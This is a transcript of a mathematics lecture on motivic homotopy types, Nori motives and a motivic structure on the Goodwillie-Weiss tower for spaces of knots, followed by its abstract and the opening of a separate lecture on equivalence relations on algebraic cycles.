Here I'm working at the infinity-categorical level, so a commutative algebra is more data than just a commutative algebra in the triangulated category. Okay. So that's the definition of a simply connected motivic homotopy type. The way you define it formally is by the following pullback diagram. So what you have is the category of commutative algebras in DA(K, Q); I take the opposite category, because it's going to be the cohomology of my homotopy type. Here I have the product over all primes of the category of p-complete spaces with a gamma_K-action. And at the bottom right corner, I have this product of the categories of commutative algebras in the derived category of Q_p with an action of gamma_K, and again I take the opposite category here. So again, by the derived category of Q_p I don't mean the triangulated category, but really the infinity category of chain complexes with Q_p coefficients. So, this functor here is taking cochains on each factor with Q_p coefficients. And this functor here is: given a motive over K, I have an etale realization, which will be a chain complex over Q_p with an action of gamma_K. And then this functor here is symmetric monoidal, so it takes commutative algebras to commutative algebras; and I can do this for each p, and this gives me a map like this. So I take this pullback, and maybe I should add some words everywhere: here it's really a full subcategory of that, where I restrict to spaces which are simply connected and of finite type, and similarly here and here. But that's how you uniformly define this category. There is a question, I see. No, I don't see any questions at the moment. But I see Markov-Balov has raised his hand. I have a question, if I may. Okay. What is the question? Sorry. The Q&A. Jovan, other questions in the Q&A? Okay. Good. Where was I? Okay. So I have this pullback square, and I can compare it to another pullback square, which actually defines the category of simply connected homotopy types, and this second pullback square is essentially due to Sullivan. So how can you construct a homotopy type? Well, you have a rational part; so again, by homotopy type I mean simply connected and of finite type. Sullivan has shown that a rational homotopy type is the same data as a commutative algebra in chain complexes over Q; that's this upper right corner. Then I have, for each prime p, a p-complete part, so I have a p-complete space for each prime p. And I have compatibility data, which is: well, I require that when I extend scalars from Q to Q_p, the commutative algebra I get is identified with the cochains on the component indexed by p, with Q_p coefficients. So this map is taking cochains with Q_p coefficients. So, yeah, that's what Sullivan called the arithmetic square: you can reconstruct a homotopy type from a rational data, a p-complete data for each prime, and a compatibility between these two things. And actually you can compare these two pullback squares. So there is a forgetful map from the top pullback square to the bottom pullback square: to a space with a gamma_K-action, you can forget the gamma_K-action, and it gives you a space. We have a question: not the closure of Q_p? The algebraic closure, you mean? Yeah. No, it's really Q_p. These are the coefficients, not the base.
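For orientation, the motivic pullback square looks schematically like this; the placement of the corners is my reconstruction of the slide, and MotHoTypes is just a name I am using here for the category of simply connected motivic homotopy types:

\[
\begin{array}{ccc}
\mathrm{MotHoTypes}_K^{\mathrm{sc}} & \longrightarrow & \prod_p \big(\mathrm{Spaces}_p^{\wedge}\big)^{\gamma_K}\\
\downarrow & & \downarrow\\
\mathrm{CAlg}\big(\mathrm{DA}(K,\mathbf{Q})\big)^{\mathrm{op}} & \longrightarrow & \prod_p \mathrm{CAlg}\big(D(\mathbf{Q}_p)\big)^{\mathrm{op}}
\end{array}
\]

with the right vertical map given by p-adic cochains and the bottom map by the etale realization; Sullivan's arithmetic square is the same picture with DA(K, Q) replaced by D(Q), with the Galois actions forgotten, and with the bottom map given by extension of scalars.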
So I have a forgetful map from this category, this product, to this product; I have a Betti realization map from this category of commutative algebras to commutative algebras in the derived category of Q; and I also have a functor from here to here that forgets the gamma_K-action. So in fact the first pullback diagram maps to the second pullback diagram, and the induced map on the upper left corner I call the Betti realization of the motivic homotopy type. So a motivic homotopy type has a Betti realization that is a homotopy type. So again, remember, everything is simply connected. Okay. So how do we construct motivic homotopy types? Well, in particular, smooth algebraic varieties over K will give me motivic homotopy types. So this superscript SC means simply connected; what I mean by that is algebraic varieties whose Betti realization is simply connected. So how do I construct this functor? Well, since this category of motivic homotopy types is a pullback, I just have to map to each of the three corners. The rational part: well, to an algebraic variety over K, I can take its motive, which is an object in the category of motives DA(K, Q), and I can take the dual, the internal dual, of that. That thing will be a commutative algebra in the category of motives; the diagonal of X induces the commutative algebra structure on this object. The p-complete part is given by the etale homotopy type: given a smooth algebraic variety over K, I can construct the etale homotopy type of its base change to K-bar, and then I p-complete that thing, and what I get is a p-complete space with an action of the absolute Galois group of the field. And I didn't write it, but these two pieces of data are compatible. So what I defined here is really a functor to motivic homotopy types. We have a question: what goes wrong if you allow non-simply connected spaces? Yeah, so the definition is the same for non-simply connected spaces; I'm going to say a word about this in a minute, but yeah, the only difference is that you have to be a bit more careful about what you mean by a p-complete space, maybe. But I'm going to give an example in a second. Okay, so what can we say about motivic homotopy types? Well, we have this theorem, which says that the cohomology groups of a motivic homotopy type are naturally Nori motives. And this structure is compatible with all the natural operations that you have on cohomology groups, for example cup products, but also maybe Steenrod operations. And you have a kind of Eckmann-Hilton dual of this theorem, about the homotopy groups: the homotopy groups of a pointed motivic homotopy type, so a motivic homotopy type with the data of a base point, can be given the structure of Nori motives. Yeah, maybe, when I say cohomology groups and homotopy groups: I said it for the first theorem but not for the second, so let me say that what I mean by the homotopy groups is really the homotopy groups of the Betti realization. And this structure that you have on homotopy groups is compatible with all the natural operations, for example Whitehead products. So maybe I'll try to explain how you can prove these theorems. It's not really hard once you have the right definition of Nori motives, so I want to say a little bit about that.
So essentially this follows work of Ayoub, Iwanari (I misspelled that, the first A and N should be swapped), Choudhury and Gallauer. So how does it work? So we have the Betti realization from the category of motives with Z coefficients to the derived category of Z; again, everything is infinity-categorical. So that's a left adjoint, and the right adjoint, B lower star, of this functor preserves filtered colimits. And yeah, moreover, this adjunction is Z-linear: both infinity categories are naturally enriched over the derived category of Z, and both the left and the right adjoint are compatible with this structure. So from these two observations: as for any adjunction, we have a comonad, in this case a comonad on D(Z). And because the right adjoint preserves filtered colimits, and since it also preserves, of course, finite homotopy colimits because D(Z) is a stable infinity category, this comonad in fact preserves all colimits. And also, since it's Z-linear, it's not very hard to prove that any Z-linear colimit-preserving functor from D(Z) to itself is of the form C maps to C tensor with something. And in that case, since our functor is a comonad, this H^A guy is in fact a coalgebra. So this H^A is just what you get when you apply the comonad to Z: you start with Z here, the complex Z concentrated in degree zero, apply B_star and apply B, and you get some coalgebra. But there is a little bit more structure than that. B is a symmetric monoidal functor, and by abstract nonsense B_star is lax monoidal. So this means that our comonad is actually lax monoidal, and this implies that H^A is in fact a commutative Hopf algebra. So Z is the unit of D(Z); when I apply B_star, I get some commutative algebra in motives, and then when I Betti realize, I get some commutative algebra in D(Z). So this H^A is what people call Ayoub's motivic Hopf algebra. And so, by abstract nonsense, we have a factorization of the Betti realization through the category of comodules over this commutative Hopf algebra. So I reword this here: I have a first functor B-tilde, which is an enhancement of the Betti realization, and a second functor U, which is just the forgetful functor: you forget the comodule structure. An observation that you can make is that if the functor B were conservative, then the first functor, B-tilde, would be an equivalence. This is the content of the Barr-Beck theorem; conservativity is the only thing that is missing, the rest of the hypotheses of the Barr-Beck theorem are satisfied. So that would be cool: we would express motives as comodules over some Hopf algebra. Unfortunately, the functor B is not conservative. That's something I learned from a paper by Ayoub. But to exhibit the lack of conservativity, you actually have to use motives that are very non-geometric. So there is a conjecture, which is open, called the conservativity conjecture, that the functor B is conservative when restricted to geometric motives, so motives that come from algebraic varieties. So if this conjecture is true, it would mean that the category of geometric motives embeds fully faithfully into comodules over H^A. Maybe a remark: the conservativity conjecture is a purely rational question. If it's true with Q coefficients, it's true with Z coefficients.
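To summarize the formal setup in symbols (my paraphrase; H^A is the Hopf algebra just described):

\[
B\colon \mathrm{DA}(K,\mathbf{Z})\;\rightleftarrows\;D(\mathbf{Z})\;:B_*,\qquad BB_*(C)\;\simeq\;C\otimes H^{A},\qquad H^{A}:=BB_*(\mathbf{Z}),
\]
\[
B\;\simeq\;U\circ\widetilde{B},\qquad \widetilde{B}\colon \mathrm{DA}(K,\mathbf{Z})\;\longrightarrow\;\mathrm{coMod}_{H^{A}}\big(D(\mathbf{Z})\big),\qquad U=\text{forget the comodule structure}.
\]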
And the point is that, in order to show this, to go from Q to Z, the problem might just come from torsion, and you have a rigidity theorem which tells you that, with torsion coefficients, this category DA is simple: an object of DA(K) with torsion coefficients is essentially just a complex with an action of the absolute Galois group of K. So the Betti realization will be conservative there. Okay. So, recall this Hopf algebra is a Hopf algebra in chain complexes over Z, so a priori it could have homology in lots of different degrees. If it were concentrated in degree zero, then the category of comodules would be the derived category of the abelian category of comodules over pi_0 of H^A, or you could also write H_0 of H^A. So that would be great, and conjecturally this is the case; this is related to the conjecture of the existence of a t-structure on the category of motives. So one half of this conjecture we know: the Hopf algebra H^A has no homology in negative degrees. It's a theorem of Ayoub, and in fact Ayoub has an explicit chain complex that represents the Hopf algebra. You would think that by staring at it you'd be able to decide whether it has homology in positive degrees or not, but it's not so easy. But in any case, what is known, by a theorem of Choudhury and Gallauer: if you take pi_0 of H^A, or H_0, the zeroth homology group of that thing, you find the Hopf algebra of the category of Nori motives. So, in case you don't know what a Nori motive is, you can take this as a definition: the category of Nori motives is the category of comodules over this. So now it's a discrete Hopf algebra; it's really in the category of abelian groups. It's actually flat over Z, so, yeah, if you want, it's an affine group scheme over Z, and you look at representations of that. So, unconditionally, we have actually factored the Betti realization through, first, the category of comodules over H^A; H^A is something which is potentially derived. And then, well, since H^A maps to pi_0 of H^A, because H^A is connective, it doesn't have homology in negative degrees, you have a sort of forgetful map: if you have a comodule over H^A, it has an underlying comodule over pi_0 of H^A, namely an object in the derived category of Nori motives. And then you have a forgetful functor U_2 to the derived category of Z. So that's unconditional. And the conservativity conjecture would say that B-tilde is maybe not quite an equivalence, but, when you restrict to geometric motives, it would be fully faithful. And the t-structure conjecture would be saying that U_1 is an equivalence. If these two conjectures are true, you've written the category of motives as the derived category of some abelian category. Okay, so now I can give the proof of the theorem I mentioned earlier, that homotopy groups of pointed motivic homotopy types are Nori motives. So, from the construction of Nori motives, you can see that a Nori motive is the data of a rational part, which is a Q-vector space with a coaction of this Hopf algebra over Q; and, for each prime p, I give myself a finitely generated Z_p-module M_p with a continuous action of the absolute Galois group of the field; and some compatibility between the two structures.
So I have an isomorphism, when I extend scalars to Q_p; sorry, I wrote H, it should be M. So that thing, sorry, the left-hand side has a gamma_K-action. And the right-hand side also has a gamma_K-action because, well, you can show that any Nori motive over Q, when you extend scalars to Q_p, carries a gamma_K-action. So once you know this, the proof of the theorem is easy. So yeah, recall the theorem: I want to show that the homotopy groups of a pointed motivic homotopy type are Nori motives. So let's take, so recall, a pointed motivic homotopy type is: A, the commutative algebra in motives with Q coefficients, and then the X_p for each p, p-complete spaces with gamma_K-actions. So on the one hand, on the rational part, I can apply this functor U_1 B-tilde, so this is from the previous slide, remember; it's the functor that goes from motives to the derived category of Nori motives. So that gives me a commutative algebra in the derived category of Nori motives. And by abstract reasoning, I mean, it's a very standard argument: if you look at how Sullivan constructs a rational homotopy type from a commutative algebra, so that's what I denote by these brackets here, so yeah, this notation is the rational homotopy type associated to this commutative algebra in the derived category of Q, the point is that the homotopy groups of that will have the structure of Nori motives with Q coefficients. Is that the same, sorry, is that the same as the primitives in the homology of the gadget? Of the algebra? Yes, yeah, you can also see it that way. Thanks. Right, and also, for each prime p, it's straightforward: the homotopy groups of X_p will have an action of gamma_K, and you have a compatibility between the two pieces of data. Okay, so what happens in the non-simply connected case? I'm not going to do the general theory, but let me give an example. And I think, well, this goes back to work of Deligne and Goncharov. So we'd like to say: if you have an algebraic variety over K, we'd like to say something like 'the fundamental group is a motive'. But of course, it doesn't make a lot of sense, because the fundamental group is in general not abelian. So how can you make sense of that? Well, how do you approximate a group by abelian groups? You have something called the lower central series. So recall the lower central series of a group g: it's defined inductively; gamma_0 of g is the group g itself, and then I define gamma_{i+1} of g to be the subgroup generated by the things that can be written as a commutator of an element of g and an element of gamma_i of g. So it's a sequence of smaller and smaller normal subgroups of g, and I can consider the quotients, and they organize themselves into a tower indexed by the integers. So I can view this tower as a pro-object in the category of groups; that's what I call the nilpotent completion of my group. So, here is the theorem you can prove, on an example which is a motivating example for what I'm going to talk about: the example of the pure braid group. For the pure braid group, you consider the Hopf algebra of continuous maps from the nilpotent completion of P_n into Z, continuous in the sense that the pro-group has a topology: you give it the inverse limit topology, where you give each term in the tower the discrete topology. So I can look at continuous functions from that group into Z; that's a Hopf algebra over Z.
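In formulas, the construction just recalled is (standard, though indexing conventions for the lower central series vary):

\[
\gamma_0(g)=g,\qquad \gamma_{i+1}(g)=\big\langle\,[x,y]\;:\;x\in g,\ y\in\gamma_i(g)\,\big\rangle,\qquad g^{\mathrm{nil}}:=\{\,g/\gamma_i(g)\,\}_{i\geq 0}\in\mathrm{Pro}(\mathrm{Groups}),
\]

and for the pure braid group P_n the Hopf algebra in question is the ring of continuous maps from P_n^nil to Z, where the pro-group carries the inverse limit of the discrete topologies.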
And the point is that this Hopf algebra can be given the structure of a Hopf algebra in Nori motives over Q. And maybe I should have said why you would expect this to be true: the point is that the pure braid group is the fundamental group of the space of configurations of n points in the complex plane, and you can view this space as the Betti realization of an algebraic variety which is defined over Q. So in that sense this is a particular case of the general question I have at the top of this slide: it's not quite pi_1 of X that has the structure of a motive, but this Hopf algebra, which is sort of the best nilpotent approximation to my group. All right. So that was all I wanted to say about motives, and I'm going back to knots. Recall, now that we have a more precise idea of what I want to do, that my main theorem was about giving the space of knots a motivic structure. I first want to say a few words about manifold calculus, because if you remember, my main theorem had this mysterious T infinity in it. Manifold calculus is a theory that was introduced by Goodwillie and Weiss. The idea is that we'd like to understand the space of embeddings from a smooth manifold M to a smooth manifold N, where M has dimension m and N has dimension n. That's hard in general, but it's easy when the source is a disk: then the homotopy type of the space of embeddings is what I denote Fr_m of the tangent bundle of N, the bundle of m-frames in the tangent bundle of N. That's a fiber bundle over N whose fiber over a point is the space of linearly independent families of m vectors in the tangent space at that point. Essentially this is saying that, up to homotopy, to embed a disk in N you can shrink the disk to its center, and all you have left is the data of the derivative of the embedding at the center, a linear map from R^m into the tangent space at that point, which, by picking a basis, you can identify with a point of the frame space. So that's for one disk; what happens if you have many disks? If M is a disjoint union of k disks, then a similar reasoning shows that the space of embeddings is homotopy equivalent to the space of configurations of k points in N, each equipped with an m-frame in the tangent space: for each disk you remember where you send the center of the disk and the derivative of the embedding at that center, and that captures everything up to a contractible choice. Okay, so we know what to do for disjoint unions of disks. So what we can do in general is try to approximate our space of embeddings by such embedding spaces. We consider the diagram which sends U, an object of Disk(M), I'm going to explain this in a second, to the space of embeddings of U into N; here Disk(M) is the poset of open subsets of M that are diffeomorphic to disjoint unions of disks. And then I take the homotopy limit over this poset. Any embedding, by restriction to disks, gives me a point in each of these spaces, and these assemble into a point in the homotopy limit. So that's the idea of manifold calculus: you try to compute the space of embeddings by studying instead this approximation, which is a complicated homotopy limit, but of spaces that are well understood.
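Schematically (Disk(M) is the poset just described, Conf_k(N) the configuration space of k points in N, and Fr_m the space of m-frames; this is only a sketch of the formulas on the slide):
\[
\mathrm{Emb}(D^m,N)\simeq\mathrm{Fr}_m(TN),\qquad
\mathrm{Emb}\Big(\textstyle\coprod_k D^m,N\Big)\simeq\big\{(x_1,\dots,x_k;\varphi_1,\dots,\varphi_k)\ :\ (x_i)\in\mathrm{Conf}_k(N),\ \varphi_i\ \text{an $m$-frame in }T_{x_i}N\big\},
\]
\[
T_\infty\,\mathrm{Emb}(M,N):=\operatorname*{holim}_{U\in\mathrm{Disk}(M)}\mathrm{Emb}(U,N),\qquad
\mathrm{Emb}(M,N)\longrightarrow T_\infty\,\mathrm{Emb}(M,N).
\]
The truncated stages T_k are obtained by restricting the homotopy limit to unions of at most k disks, as explained next.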
And there's a theorem of Goodwillie and Klein that says that in some cases, the condition being that the codimension n minus m is at least three, this map is a weak equivalence. But in general, even if the codimension condition fails, you can consider the limit, the right hand side of this map, which you denote T infinity. In fact you have a tower: for each k, you denote by T_k of Emb(M, N) the homotopy limit over the category Disk(M) with at most k disks, the category of open sets that are diffeomorphic to a disjoint union of at most k disks. These things organize themselves into a tower: you have the space of embeddings, T infinity, and then the T_k for each k. If we do this for knots, there is an important theorem due to Dwyer and Hess, and independently to Turchin. Maybe first of all, this doesn't quite fit the framework I explained on the previous slide, because you have this subscript c: it's not quite embeddings, it's compactly supported embeddings, but you can adapt the theory of manifold calculus to this. The theorem of Dwyer and Hess and of Turchin, who proved it independently, is that you can understand this approximation, this T_k of the embedding space, in terms of this space here. Omega squared means twofold loop space, E_n is my notation for the little n-disks operad, and "less than or equal to k" means I truncate it up to arity k. So this is the derived mapping space from the E_1 operad truncated at arity k to the E_d operad truncated at arity k; the map here is given by restriction, I take the homotopy fiber of that map, and then I take the twofold loop space. This looks quite complicated and a bit crazy. In fact, I'm not going to explain the proof of the theorem, it's quite involved, but if you try to unpack what this right hand side is, you will see that this twofold loop space of the mapping space is some sort of homotopy limit: if you pick a presentation of E_1, this mapping space can be viewed as a homotopy limit of things that are configurations of points in R^d. And if you recall the previous slide, the T_k thing was also some kind of homotopy limit of configurations of points in the target, which in this case is R^d. So that gives a vague idea of why this theorem is true. In particular, this theorem implies that T_k of the embedding space is a twofold loop space. Can I ask a silly question? Yes. Roughly speaking, when you map into the truncation at k, are you just sort of gluing the little intervals in E_1 together along things? Is that the idea? Is that what the two means, that you're taking two intervals and seeing how they glue together, because you're trying to map a longer and longer piece of R^1? Yeah, I think it's not quite that. Okay, sorry, it's a bit complicated to explain. Okay. Yeah. So the structure of a twofold loop space is compatible with connected sum for knots. I think I have a picture; here's how connected sum works. You have a long knot in R^d and another long knot in R^d, and you can glue them together to get a third knot in R^d. That gives the space of embeddings the structure of a loop space, in fact.
It's not clear that it's a twofold loop space, but at least it's a loop space. And recall that the embedding space maps to each of the T_k of the embedding space, and the loop space structures are compatible. Okay. So this Goodwillie-Weiss tower, this manifold calculus tower, is related to the theory of finite type invariants for knots. Let me explain quickly what this is; the definition is due to Vassiliev and Goussarov. So the definition: what is an additive invariant of degree at most k for knots? It is a map from the set of knots, pi_0 of the space of embeddings, to an abelian group A, which is a monoid homomorphism (the set of knots has a monoid structure given by connected sum), and which is invariant under infection by pure braids lying in the (k+1)st term of the lower central series of the pure braid group. So the lower central series that appeared in the theory of motives also appears here in the theory of knots. What do I mean by infection by a pure braid? Here's a picture. Here's a knot, and inside there is a box, a three-ball in my R^3, such that the intersection of my knot with this three-ball is a trivial braid with three strands. Now I can pick any pure braid with three strands and replace what's in that box by my pure braid, and this gives me a different knot. That's what I call infection of the knot by a pure braid. And an invariant of degree at most k will not see the difference between this knot and that knot if the braid you used lies in that term of the lower central series. So the higher k is, the finer the invariant is. And there's a conjecture, which in this precise form I think first appeared in a paper by Budney, Conant, Koytcheff and Sinha: the map from pi_0 of the embedding space to pi_0 of the (k+1)st stage of the Goodwillie-Weiss tower is the universal additive invariant of degree at most k. Universal means it's the initial object in the category of additive invariants: any other additive invariant factors through this one. What's known about this conjecture? It's true after tensoring with Q; that's essentially due to Kontsevich, via the construction called the Kontsevich integral. And Kosanović in her thesis has shown that this map is surjective, which implies that maybe it's not the universal additive invariant, but at least it's a quotient of the universal additive invariant of degree at most k. Okay, so now I can give a precise formulation of the main theorem I stated at the beginning. So d is greater than or equal to three, k is any integer, at least two, and it can be infinity, and I look at this homotopy fiber, built out of the mapping space from the E_1 operad to the truncated E_d operad. Recall from the previous slide that if I take twofold loops on this, it gives me the k-th term in the Goodwillie-Weiss tower that approximates the space of knots; so this is a twofold delooping of the k-th stage of the tower, and it is actually a simply connected space. The theorem is that this space has the structure of a non-trivial motivic homotopy type. Since it's simply connected, I don't have to worry about pi_1, so this is really the definition I gave at the beginning.
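Written out schematically (the notation F_{k,d} for the homotopy fiber is introduced here only for this summary; the precise restriction map is the one on the slide and is not reproduced):
\[
F_{k,d}:=\operatorname{hofib}\big(\text{restriction map between the truncated operad mapping spaces}\big),\qquad
\Omega^{2}F_{k,d}\;\simeq\;T_k\,\mathrm{Emb}_c(\mathbf{R},\mathbf{R}^{d}),
\]
and the theorem says that for d at least 3 and 2 \le k \le \infty the simply connected space F_{k,d} admits a non-trivial structure of a motivic homotopy type.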
So in particular the homotopy groups of this Goodwillie-Weiss approximation, not just pi_0 but all homotopy groups, are going to have the structure of Nori motives. And when d is at least four, we have the Goodwillie-Klein convergence theorem, which says that the limit of the Goodwillie-Weiss tower actually computes the space of embeddings, so then we have a statement about the actual homotopy groups of the embedding space. The important word in this theorem is "non-trivial", because you can always give a sort of trivial motivic structure to any homotopy type: essentially, a motivic homotopy type can be thought of as a homotopy type with an action of some profinite group, and you can always give it the trivial action. What's important here is that the structure is non-trivial, and we can actually deduce things from this non-triviality. This space is simply connected, as I said. I can give a very quick sketch of the proof. The input we need is the structure of a motivic homotopy type on the operad E_2. Here we have to use non-simply-connected spaces, because the spaces that appear in this operad are not simply connected; so we have to take a detour through non-simply-connected spaces, even though the statement of the theorem is a purely simply connected statement. Then we use a result due to Jacob Lurie called additivity for the little disks operads: we can write the little d-disks operad as E_2 tensor E_{d-2}. And what you do is, well, you give E_{d-2} the trivial motivic structure and you give E_2 its non-trivial one; I'm going to explain in a second where it comes from. The point is that if you pick a map from E_1 to E_d, it will factor through the E_{d-2} part, the one with the trivial structure. So this mapping space will have a motivic homotopy type structure, the base points are preserved here and here, these two spaces will be pointed motivic homotopy types, and the homotopy fiber will then inherit a pointed motivic homotopy type structure. Okay, so the only thing I have to explain is where the motivic homotopy type structure on E_2 comes from, but I realize I only have five minutes left, so let me explain this very quickly. Essentially, as always, there is a rational part and a p-complete part for each prime. The rational part comes from the fact that the rationalized little 2-disks operad has an action of the group called the Grothendieck-Teichmüller group, and this Grothendieck-Teichmüller group receives a map from Ayoub's motivic Galois group; so the rationalized little 2-disks operad has an action of Ayoub's motivic Galois group, and that's how you do the rational part of the story. For the p-complete part, similarly, there is a pro-p Grothendieck-Teichmüller group, and the p-complete little 2-disks operad has an action of this pro-p Grothendieck-Teichmüller group. These two results are essentially due to Drinfeld; they were put into the homotopical context, in the rational situation, by Fresse, and in the p-complete case in a paper that I wrote. So we have this action of the pro-p Grothendieck-Teichmüller group on the p-complete little 2-disks operad, and there is a map of profinite groups from the absolute Galois group of Q to the pro-p Grothendieck-Teichmüller group; that's how you construct the Galois action. And these two pieces of data are compatible.
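In diagram form (GT denotes the Grothendieck-Teichmüller group and GT_p its pro-p version; the arrows and actions are the ones asserted in the talk, not constructed here):
\[
G^{\mathrm{mot}}_{\mathrm{Ayoub}}\longrightarrow \mathrm{GT}(\mathbf{Q})\ \curvearrowright\ (E_2)_{\mathbf{Q}},
\qquad
\mathrm{Gal}(\overline{\mathbf{Q}}/\mathbf{Q})\longrightarrow \mathrm{GT}_p\ \curvearrowright\ (E_2)^{\wedge}_p,
\]
together with a compatibility between the rational and the p-complete actions for each prime p.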
That's what gives E_2 the structure of a motivic homotopy type. There is a second approach, which comes from recent work of Dmitry Vaintrob: he has an algebro-geometric model for the little 2-disks operad using a log scheme, but I'm not going to explain this. Okay, so we have this structure of a motivic homotopy type on the space of knots, or rather on this Goodwillie-Weiss approximation, in the case of knots in R^3. What can we use this for? One theorem we can deduce from it is a partial answer to the conjecture I mentioned, that the Goodwillie-Weiss tower produces the universal additive invariant for knots. In joint work with Pedro Boavida we can prove that this is true after inverting primes: the map to the (k+1)st stage of the Goodwillie-Weiss tower is the universal additive invariant of degree at most k after inverting prime numbers that are small with respect to k (sorry, this n here should be a k). So the larger k is, the more prime numbers you have to invert. That's a theorem we prove using this motivic structure. Roughly, the idea is that this Goodwillie-Weiss tower, which computes the homotopy type of the space of knots, induces a spectral sequence that tries to compute the homotopy groups of the limit of the tower. Since the tower now carries the extra data of a motivic homotopy type, the spectral sequence has more algebraic structure: there are restrictions on the differentials, because they have to be compatible with this data, and this forces many differentials to be zero. Then we use the work in Danica Kosanović's thesis, where she proves that if the Goodwillie-Weiss spectral sequence collapses, this implies a positive answer to this conjecture, the statement that the (k+1)st stage of the tower is the universal additive invariant of degree at most k. And I think I'm out of time, so maybe I'll just say that you can also compute higher homotopy groups in a range of degrees using this kind of data. And that's it. Thank you. Okay, many thanks indeed. Any questions or comments? Yes, I have a question: is it possible to lift this motivic homotopy type to a homotopy type in, say, SH of k or something like that, or is it completely out of reach? I think SH is fine. I mean, no one has really written the details of this, but everything I've explained with DA you could do in SH instead. But you really want these two glued parts, the rational one and the p-complete ones; that's it. In some sense this is not a very good definition, it looks a bit ad hoc. Yeah, but okay. Essentially, the idea of a motivic homotopy type is to try to capture as much unstable data as possible from stable information; that's the idea of this notion. And the Galois action is really used, for example, for the vanishing of differentials that you mentioned? Yeah, in fact you don't need the full structure: the theorem is just a theorem about the p-complete part of this data, so it's just a theorem about the Galois action; that's how we wrote it in our paper. But I think it's nice to have the full structure. Other questions? It seems that we don't have any other questions, so let's thank the speaker again.
Thank you very much.
|
The pure braid group is the fundamental group of the space of configurations of points in the complex plane. This topological space is the Betti realization of a scheme defined over the integers. It follows, by work initiated by Deligne and Goncharov, that the pronilpotent completion of the pure braid group is a motive over the integers (what this means precisely is that the Hopf algebra of functions on that group can be promoted to a Hopf algebra in an abelian category of motives over the integers). I will explain a partly conjectural extension of that story from braids to knots. The replacement of the lower central series of the pure braid group is the so-called Vassiliev filtration on knots. The proposed strategy to construct the desired motivic structure relies on the technology of manifold calculus of Goodwillie and Weiss.
|
10.5446/50934 (DOI)
|
Thank you so much. I would like to start by thanking Paul, Grigory, Frédéric and Aravind for the invitation to give this course. I would also like to thank the IHES for being so accommodating throughout this academic year, in particular for setting up this machinery that allows me to use this old school technology called the blackboard. And I would also like to thank the audience here for making the talk a little bit more human. So the course consists of three lectures. The first lecture will be about some celebrated conjectures and about their non-commutative counterparts; I will always use the notation NC for non-commutative. Then in the second lecture, which will be on Wednesday, I'll be talking about implications of this non-commutative viewpoint on these conjectures for non-commutative geometry. And then on Thursday, in the final lecture, I will talk about applications of this non-commutative viewpoint to classical geometry. So let me start with some notations. Throughout the course, little k will always be a perfect field of characteristic p, with p greater or equal than zero. In the case where p is positive, I will write W(k) for the ring of p-typical Witt vectors and capital K for its fraction field, so I invert p. For example, if k is F_p, then W(k) is just the ring of p-adic integers and K is the field of p-adic numbers. I will also write sigma for the automorphism of capital K induced by the Frobenius on little k, raising to the p-th power. And let's start with a scheme X, which I will assume to be a smooth and proper k-scheme of dimension d. Okay, so these conjectures are almost all of them about algebraic cycles, so let me say something about algebraic cycles. We can consider this graded Q vector space, graded by codimension: I look at algebraic cycles of codimension i on X with rational coefficients. If we consider one algebraic cycle, we can impose several different equivalence relations here, because this is a huge graded Q vector space, so there are a lot of different equivalence relations. For example, rational equivalence: an algebraic cycle alpha is rationally equivalent to zero, by definition, if there exists an algebraic cycle beta on the product of X with the projective line such that alpha is the difference of the evaluations of beta at zero and at infinity. Intuitively speaking, two algebraic cycles are rationally equivalent if you can deform one into the other using the projective line. Then there is another equivalence relation, called nilpotence equivalence. Here you say that an algebraic cycle alpha is nilpotently trivial, by definition, if there exists an integer n such that when you cross your algebraic cycle with itself n times, giving an algebraic cycle on the product of n copies of X, this algebraic cycle is rationally equivalent to zero. So if there exists an integer such that this external power of the cycle disappears, you say that it's nilpotently trivial. So Gonçalo, can you write really bigger, maybe two times bigger, because there are several people complaining.
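In formulas (writing Z^i(X)_Q for codimension i cycles with rational coefficients, as on the board):
\[
\alpha\sim_{\mathrm{rat}}0 \iff \exists\,\beta\in Z^{i}(X\times\mathbf{P}^1)_{\mathbf{Q}}\ \text{with}\ \alpha=\beta|_{0}-\beta|_{\infty},
\qquad
\alpha\sim_{\mathrm{nil}}0 \iff \exists\,n\ \text{with}\ \underbrace{\alpha\times\cdots\times\alpha}_{n}\sim_{\mathrm{rat}}0\ \text{on}\ X^{n}.
\]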
And then there is homological equivalence. Here you choose a Weil cohomology theory; there are many Weil cohomology theories, and for our purposes I am going to consider solely de Rham cohomology in characteristic zero and crystalline cohomology in characteristic p. Any Weil cohomology theory comes equipped with a cycle class map towards the cohomology H^{2i} of X twisted by i, and you say that your algebraic cycle is homologically equivalent to zero if it disappears after applying the cycle class map. Okay. Then another interesting equivalence relation is numerical equivalence. Here you look at algebraic cycles of codimension i with Q coefficients, up to rational equivalence, and you pair them with algebraic cycles of complementary codimension to extract a rational number: given two algebraic cycles alpha and beta, you intersect them, which gives a cycle of dimension zero, and then you take the degree. Let's write this pairing as <alpha, beta>. And you say that a cycle is numerically equivalent to zero if, by definition, this pairing vanishes for every beta. Okay. So we have these four different equivalence relations on algebraic cycles. And the remark is that if a cycle is rationally equivalent to zero, then it is nilpotently equivalent to zero, then it is homologically equivalent to zero, and then it is necessarily numerically equivalent to zero. That implies that, at the level of algebraic cycles, you have all these quotients when you impose the different equivalence relations. The interesting point is that when you impose the one at the very end you get something finite dimensional, but the others are not necessarily finite dimensional; they can be very big. For example, there is a famous result of Mumford: if the base field is large, for example if you are over C, and you take a surface with positive genus, then the space of algebraic cycles of codimension two on your surface, up to rational equivalence, is infinite dimensional. So this can be pretty large, depending on the base field, while the numerical quotient is always finite dimensional. Now there are a lot of conjectures about these different equivalence relations. One of them is the famous conjecture of Grothendieck, the Grothendieck standard conjecture of type D, a conjecture from the 60s that says the following. So Gonçalo, maybe there's a question that you could answer first. Someone is confused and asks whether all the relations are with rational coefficients. Yes, I'm working with rational coefficients; it's not mandatory, but in my particular talk I'm doing that, and it will become clear why by the end of the talk. Also there's a question about the fact that you start in characteristic p but you seem to work over C. I'm working in characteristic p, but my p is greater or equal than zero, so it can be zero. Okay. There is also algebraic equivalence. There is, but it's not on the board; I ignore it. It would sit here, because algebraic equivalence implies numerical equivalence. Yes.
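Summarizing the chain of implications just described (same notation; "hom" refers to the chosen Weil cohomology and "num" to the intersection pairing):
\[
Z^{i}(X)_{\mathbf{Q}}/\!\sim_{\mathrm{rat}}\ \twoheadrightarrow\ Z^{i}(X)_{\mathbf{Q}}/\!\sim_{\mathrm{nil}}\ \twoheadrightarrow\ Z^{i}(X)_{\mathbf{Q}}/\!\sim_{\mathrm{hom}}\ \twoheadrightarrow\ Z^{i}(X)_{\mathbf{Q}}/\!\sim_{\mathrm{num}},
\]
and only the last quotient is known in general to be finite dimensional.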
